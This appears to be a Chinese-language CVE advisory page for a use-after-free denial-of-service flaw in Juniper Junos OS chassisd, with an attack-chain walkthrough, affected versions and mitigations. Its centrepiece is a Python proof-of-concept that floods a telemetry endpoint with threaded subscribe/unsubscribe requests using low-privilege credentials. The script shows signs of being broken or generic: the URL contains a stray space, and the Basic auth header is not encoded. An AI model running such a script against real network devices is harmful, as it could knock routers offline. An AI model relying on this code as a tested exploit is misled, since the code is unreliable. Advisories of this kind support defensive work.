CVE-2026-21921 Juniper Junos OS 底盘守护进程Use After Free拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-21921

漏洞类型

Use After Free

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS, Junos OS Evolved

漏洞概述

CVE-2026-21921是Juniper Networks Junos OS及Junos OS Evolved产品中底盘守护进程(chassisd)存在的一个Use After Free(释放后重用)安全漏洞。该漏洞允许经过低权限认证的网络攻击者通过频繁订阅和取消订阅传感器来触发漏洞，最终导致遥测功能进程(如chassisd、rpd或mib2d)崩溃并重启。根据受影响进程的不同，攻击可能导致系统完全中断，直至系统恢复为止。此漏洞的CVSS评分为6.5，属于中等严重级别，攻击向量为网络形式，无需用户交互，攻击者仅需拥有低权限账号即可实施攻击。漏洞主要影响遥测数据采集功能，通过反复的订阅/取消订阅操作耗尽内存或触发竞态条件，从而造成进程异常终止。

技术细节

该漏洞的根本原因在于Junos OS的遥测子系统在处理传感器订阅生命周期管理时存在内存管理缺陷。当攻击者通过认证后的低权限账户反复执行传感器订阅和取消订阅操作时，底盘守护进程(chassisd)中的内存分配和释放逻辑出现竞态条件。具体而言，进程在释放某个内存块后，未能正确清理相关指针，导致后续代码可能访问已释放的内存区域。这种Use After Free条件在高频订阅/取消订阅场景下被触发，可能导致进程访问无效内存地址，引发崩溃。攻击者利用此漏洞需要具备基本的网络访问能力和低权限账户，通过自动化脚本快速发送大量的订阅/取消订阅请求即可触发DoS条件。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Juniper设备，确认其运行存在漏洞的Junos OS版本，并获取有效的低权限账户凭证

STEP 2

步骤2: 认证连接

攻击者使用低权限账户通过网络访问目标设备的遥测接口，建立认证会话

STEP 3

步骤3: 构造恶意请求

攻击者构造大量的传感器订阅和取消订阅请求，通过自动化脚本高频发送这些请求

STEP 4

步骤4: 触发Use After Free

高频订阅/取消订阅操作在chassisd进程中触发内存释放后重用漏洞，导致进程访问已释放的内存

STEP 5

步骤5: 进程崩溃

Use After Free条件导致底盘守护进程(chassisd)或其他遥测进程(rpd/mib2d)崩溃并重启

STEP 6

步骤6: 拒绝服务

关键进程崩溃导致系统功能中断，在进程恢复前形成完整的DoS攻击效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-21921 PoC - Juniper Junos OS Telemetry DoS
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import concurrent.futures
import time
import argparse

def subscribe_sensor(target_ip, sensor_path, username, password):
    """Subscribe to telemetry sensor"""
    url = f"https://{target_ip}/api/ telemetry/subscribe"
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Basic {username}:{password}"
    }
    payload = {
        "path": sensor_path,
        "format": "json"
    }
    try:
        response = requests.post(url, json=payload, headers=headers, verify=False, timeout=5)
        return response.status_code == 200
    except:
        return False

def unsubscribe_sensor(target_ip, sensor_path, username, password):
    """Unsubscribe from telemetry sensor"""
    url = f"https://{target_ip}/api/ telemetry/unsubscribe"
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Basic {username}:{password}"
    }
    payload = {
        "path": sensor_path
    }
    try:
        response = requests.post(url, json=payload, headers=headers, verify=False, timeout=5)
        return response.status_code == 200
    except:
        return False

def attack_worker(target_ip, sensor_path, username, password, iterations):
    """Worker function to perform subscribe/unsubscribe cycle"""
    for _ in range(iterations):
        subscribe_sensor(target_ip, sensor_path, username, password)
        unsubscribe_sensor(target_ip, sensor_path, username, password)
        time.sleep(0.01)

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-21921 PoC')
    parser.add_argument('--target', required=True, help='Target Junos device IP')
    parser.add_argument('--username', required=True, help='Low-privilege username')
    parser.add_argument('--password', required=True, help='Password')
    parser.add_argument('--threads', type=int, default=10, help='Number of threads')
    parser.add_argument('--iterations', type=int, default=100, help='Iterations per thread')
    
    args = parser.parse_args()
    
    sensor_paths = [
        "/junos/system/line-card/environment/",
        "/junos/system/line-card/interface/",
        "/junos/system/line-card/optics/"
    ]
    
    print(f'[*] Starting CVE-2026-21921 attack on {args.target}')
    print(f'[*] Using {args.threads} threads with {args.iterations} iterations each')
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = []
        for sensor in sensor_paths:
            future = executor.submit(attack_worker, args.target, sensor, 
                                   args.username, args.password, args.iterations)
            futures.append(future)
        
        concurrent.futures.wait(futures)
    
    print('[+] Attack completed')

if __name__ == '__main__':
    main()

影响范围

Junos OS < 22.4R3-S8

Junos OS 23.2 < 23.2R2-S5

Junos OS 23.4 < 23.4R2

Junos OS Evolved < 22.4R3-S8-EVO

Junos OS Evolved 23.2 < 23.2R2-S5-EVO

Junos OS Evolved 23.4 < 23.4R2-EVO

防御指南

临时缓解措施

如果无法立即升级，可采取以下缓解措施：1)限制对遥测功能的访问，仅允许受信任的管理网络访问；2)监控chassisd、rpd、mib2d等进程的稳定性和重启频率；3)实施账户权限最小化原则，确保低权限账户无法访问敏感遥测接口；4)配置防火墙规则限制对设备管理接口的非授权访问；5)启用详细的日志记录以便及时发现异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-21921
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-21921
3 Details https://www.cvedetails.com/cve/CVE-2026-21921/
4 VulDB https://vuldb.com/cve/CVE-2026-21921
5 Link https://kb.juniper.net/JSA106021
6 Link https://supportportal.juniper.net/JSA106021